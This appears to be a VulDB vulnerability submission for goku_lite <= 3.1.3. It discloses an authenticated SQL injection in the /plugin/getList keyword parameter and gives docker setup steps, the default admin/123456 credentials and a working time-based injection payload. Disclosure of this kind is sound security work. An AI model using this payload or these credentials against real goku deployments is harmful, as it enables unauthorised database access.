| 标题 | goku_lite <= 3.1.3 Authenticated SQL injection via /plugin/getList route and keyword parameter |
|---|
| 描述 | # Get start
repo: ** https://github.com/eolinker/goku_lite **
- Execute docker command
- Start goku
```bash
docker run
docker run -dt -p 7000:7000
-v /app/goku-ce/work:/app/goku-ce/console/work
-e GOKU_ADMIN_PASSWORD=123456
--network=goku-ce
--ip 172.18.12.2
--name goku-ce-console
eolinker/goku-api-gateway-ce-console
```
user/pass:
admin/123456
# vulnerability
goku_lite <= 3.1.3 Authenticated SQL injection via /plugin/getList route and keyword parameter
use admin/123456 to login
POC:
Request URL: http://testlink:7000/plugin/getList
Request Method: POST
PostData: keyword=' AND 8247=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2))))-- PSdW
Use sqlmap :


Please show QSec-Team in the detail of cve page.
Thanks,
QSec-Team |
|---|
| 用户 | qsec (UID 33968) |
|---|
| 提交 | 2022-11-11 12時25分 (4 年前) |
|---|
| 管理 | 2022-11-11 13時14分 (48 minutes later) |
|---|
| 状态 | 已接受 |
|---|
| VulDB条目 | 213454 [eolinker goku_lite /plugin/getList route/keyword SQL注入] |
|---|
| 积分 | 17 |
|---|